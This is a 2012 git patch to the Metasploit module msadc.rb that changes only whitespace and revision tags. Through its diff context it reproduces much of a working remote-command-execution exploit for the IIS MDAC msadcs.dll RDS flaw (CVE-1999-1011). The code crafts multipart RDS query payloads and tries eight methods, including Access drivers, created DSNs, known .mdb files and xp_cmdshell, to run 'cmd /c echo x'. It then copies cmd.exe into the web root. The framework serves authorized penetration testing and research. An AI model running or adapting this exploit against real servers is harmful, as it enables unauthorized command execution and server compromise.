From 6d0dbcb106b21201d328829b5a9df669d613d4bc Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 6 Jun 2012 11:10:05 -0500 Subject: [PATCH] Remove whitespace --- modules/exploits/windows/iis/msadc.rb | 80 ++++++++++++--------------- 1 file changed, 36 insertions(+), 44 deletions(-) diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 12dfd0ed08..5232eeb7d6 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize super( - 'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution', + 'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution', 'Description' => %q{ This module can be used to execute arbitrary commands on IIS servers that expose the /msadc/msadcs.dll Microsoft Data Access Components @@ -39,20 +35,19 @@ class Metasploit3 < Msf::Exploit::Remote and useful for debugging. Also set NAME to obtain the remote hostname, and METHOD to use the alternative VbBusObj technique. }, - 'Author' => 'patrick', - 'Version' => '$Revision$', - 'Platform' => 'win', - 'References' => + 'Author' => 'patrick', + 'Platform' => 'win', + 'References' => [ ['OSVDB', '272'], ['BID', '529'], ['CVE', '1999-1011'], ['MSB', 'ms98-004'], - ['MSB', 'ms99-025'], + ['MSB', 'ms99-025'] ], - 'Targets' => + 'Targets' => [ - # patrickw tested meterpreter OK 20120601 + # patrickw tested meterpreter OK 20120601 # nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx # w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp [ 'Automatic', { } ], @@ -91,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote def create_dsn(drive, dsn) req = "/scripts/tools/newdsn.exe?driver=Microsoft\%2BAccess\%2BDriver\%2B\%28*.mdb\%29\&dsn=#{dsn}\&dbq=#{drive}\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr=" - + res = send_request_raw({ - 'uri' => req, + 'uri' => req, }) - + if (res and res.code == 200 and res.body =~ /

Datasource creation FAILED! The most likely cause is invalid attributes<\/B><\/H2>/) vprint_error("DSN CREATE failed for drive #{drive} with #{dsn}.") return false @@ -104,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote return true end end - + def exec_cmd(sql, cmd, d) boundary = rand_text_alphanumeric(8) method = datastore['METHOD'] ? "VbBusObj.VbBusObjCls.GetRecordset" : "AdvancedDataFactory.Query" @@ -118,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote end vprint_status("Attempting to request: #{select} on #{d}") - + query = "\x02\x00\x03\x00\x08\x00#{[select.size].pack('S')}\x00\x00#{select}\x08\x00#{[dsn.size].pack('S')}\x00\x00#{dsn}" - - sploit = "--#{boundary}\r\n" + + sploit = "--#{boundary}\r\n" sploit << "Content-Type: application/x-varg\r\n" sploit << "Content-Length: #{query.length}\r\n\r\n" sploit << query sploit << "\r\n--#{boundary}--\r\n" - + data = "ADCClientVersion:01.06\r\n" data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=3' data << "\r\n\r\n" @@ -140,14 +135,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Content-Length' => data.length, 'Connection' => "Keep-Alive", }, - 'method' => 'POST', 'data' => data, - }) - + response = Rex::Text.to_ascii(res.body, 'utf-16be') - + if (response =~ /HTTP:\/\/www.microsoft.com\/activex.vip\/adofx/ || res.body =~ /o.u.t.p.u.t./) vprint_good("Command was successfully executed! Statement: #{select} Driver: #{d}") return true, sql, d @@ -190,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_error("Server accepted request however it failed for reasons unknown.") elsif (res.body =~ /\x09\x00\x01/) # magic bytes? rfp used it too :P maybe a retval? vprint_error("Unknown reply - but the command didn't execute") - else + else vprint_status("Unknown reply - server is likely patched:\n#{response}") end return false @@ -205,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "ADCClientVersion:01.06\r\n" data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=0' data << "\r\n\r\n--#{boundary}--\r\n" - + res = send_request_raw({ 'uri' => datastore['PATH'] + '/VbBusObj.VbBusObjCls.GetMachineName', 'agent' => 'ACTIVEDATA', @@ -214,12 +207,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Content-Length' => data.length, 'Connection' => "Keep-Alive", }, - 'method' => 'POST', 'data' => data, - + }) - + if (res.code == 200 and res.body =~ /\x01(.+)/) # Should return the hostname print_good("Hostname: #{$1}") end @@ -237,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote "\\system32\\ias\\ias.mdb", "\\system32\\ias\\dnary.mdb", "\\system32\\certlog\\certsrv.mdb" ] - + mdbs = [ "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", #these are non-windows "\\cfusion\\cfapps\\forums\\forums_.mdb", "\\cfusion\\cfapps\\forums\\data\\forums.mdb", @@ -255,16 +247,16 @@ class Metasploit3 < Msf::Exploit::Remote "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb", "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb" ] - + print_status("Step 1: Trying raw driver to btcustmr.mdb") - + drives.each do |drive| sysdirs.each do |sysdir| ret = exec_cmd("Select * from Customers where City=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=#{drive}:\\#{sysdir}\\help\\iis\\htm\\tutorial\\btcustmr.mdb;") return ret if (ret) end end - + print_status("Step 2: Trying to make our own DSN...") x = false # Stop if we make a DSN drives.each do |drive| @@ -274,21 +266,21 @@ class Metasploit3 < Msf::Exploit::Remote end end end - + table = rand_text_alphanumeric(3) print_status("Step 3: Trying to create a new table in our own DSN...") exec_cmd("create table #{table} (B int, C varchar(10))", nil, "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general make table query - + print_status("Step 4: Trying to execute our command via our own DSN and table...") ret = exec_cmd("select * from #{table} where C=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general exploit table query return ret if (ret) - + print_status("Step 5: Trying to execute our command via known DSNs...") dsns.each do |dsn| ret = exec_cmd("select * from MSysModules where name=", "cmd /c echo x", dsn) # this is table-independent query (new) return ret if (ret) end - + print_status("Step 6: Trying known system .mdbs...") drives.each do |drive| sysdirs.each do |sysdir| @@ -299,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote end end end - + print_status("Step 7: Trying known program file .mdbs...") drives.each do |drive| mdbs.each do |mdb| @@ -308,14 +300,14 @@ class Metasploit3 < Msf::Exploit::Remote return ret if (ret) end end - + print_status("Step 8: Trying SQL xp_cmdshell method...") ret = exec_cmd("EXEC master..xp_cmdshell", "cmd /c echo x", "driver={SQL Server};server=(#{datastore['DBHOST']});database=#{datastore['DBNAME']};uid=#{datastore['DBUID']};pwd=#{datastore['DBPASSWORD']}") # based on hdm's sqlrds.pl :) return ret if (ret) - + return -1 end - + def exploit print_status("Searching for valid command execution point...") x = false @@ -325,10 +317,10 @@ class Metasploit3 < Msf::Exploit::Remote break end end - + if (x == true) print_good("Successful command execution found!") - + # now copy the file exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe" print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...") @@ -396,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote def cleanup framework.events.remove_exploit_subscriber(self) end - + def execute_command(cmd, opts = {}) # Don't try the start command... # Using the "start" method doesn't seem to make iis very happy :(